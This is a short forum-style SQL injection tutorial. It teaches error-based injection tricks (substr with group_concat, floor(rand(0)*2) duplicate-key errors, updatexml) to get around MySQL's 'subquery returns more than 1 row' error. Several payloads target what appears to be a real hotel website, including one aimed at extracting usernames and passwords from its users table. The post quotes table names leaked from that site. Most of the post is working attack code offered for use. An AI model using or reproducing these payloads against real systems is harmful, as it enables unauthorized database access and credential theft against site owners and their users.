Bypass subquery returns more than 1 row

Hi everyone,Today I'll show you a SQLI TIP,get large data with one request using substr function. use 'limit' is slow,so im gonna teach you how to bypass the error 1242,"'subquery returns more than 1 row'".

I) Using substr function
==

the subtr function is usually for blind injection,but we can use this for bypass the limit of group_concat and the error 1242.
for example,

Code:

http://www.lermitagehotel.ee/?pageid=160 +and+(select+1+from+(select+count(*),concat((select(select+concat(concat(user_na ​ me,0x3a,user_pass),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+informat ​ion_schema.tables+group+by+x)a)

error 1242-
Subquery returns more than 1 row.
we can use substr like that

Code:

And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(column1,0x3a,column2),1,150)
from table where table_schema like database()),0x3a,floor(rand(0)*2))x
from information_schema.tables group by x)z)-- -

so

Code:

http://www.lermitagehotel.ee/?pageid=160 And(select 1 from(select count(*),concat(0x3a,(select substr(group_concat(table_name),1,150)from information_schema.tables where table_schema like database()),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)z)-- -

and

Quote:Duplicate entry ':admin_topmenu,album_photos,albums,defaults,form_items,form_log,' for key 'group_key'

Incre substr(group_concat(table_name),1,150) ... substr(group_concat(table_name),30,150)... to get next
--
in mysql>5

Code:

or 1 group by concat_ws(0x3a,(select substr(group_concat(column),1,150)
from table),floor(rand(0)*2)) having min(0) or 1-- -

--
in mysql 5.1+

Code:

and updatexml(0,concat(0x3a,(select substr(group_concat(column),1,150)
from table)),0)-- -

--
notice: sometimes query number 2 dosent work,so use the first one.

Code:

II) Using concat() and group_concat()
==

Code:

and updatexml(0,concat(0x3a,(select concat(0x3a,group_concat(column))
from table)),0)-- -

only for extractvalue() / updatexml().